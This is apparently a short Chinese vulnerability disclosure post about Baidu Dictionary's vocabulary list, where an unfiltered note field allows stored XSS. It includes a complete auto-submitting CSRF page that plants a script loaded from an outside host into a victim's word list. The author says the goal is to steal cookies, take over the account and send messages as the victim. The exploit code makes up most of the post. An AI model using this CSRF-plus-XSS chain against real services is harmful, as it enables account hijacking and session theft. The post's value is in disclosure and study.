百度某站可结合csrf及xss劫持账号，本来是一个self-xss，后来觉得可以结合csrf，今天才发现已经有人才这么干了！
百度词典-我的词典

将生词添加生词本，备注的时候没有过滤，直接添加js 可被执行。

这是一个self-xss ，无法交互影响到他人，于是考虑csrf，自动添加一个单词并且备注为【xss code】

由于是post 请求，构造页面

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<form id="baidu" name="baidu" action="http://dict.baidu.com/wordlist.php" method="POST">
<input type="text" name="req" value="add" />
<input type="text" name="word" value="Wooyun" />
<input type="text" name="explain" value="<script src=http://xsserme></script>" />
<input type="submit" value="submit" />
</form>
<script>
 document.baidu.submit();
</script>
</body>
</html>

诱惑其他人访问此页面的效果

还有一个json？

看内容与金山词霸有点关系哦，没有深入
http:\/\/res.iciba.com\/resource\/amp3\/0\/0\/90\/01\/9001507f72.mp3

至此可某学霸的单词本里植入一个单词，偷走他的cookie，游荡他的账号，给女神发短消息。

另外，这里还有个mysql 报错，问了大牛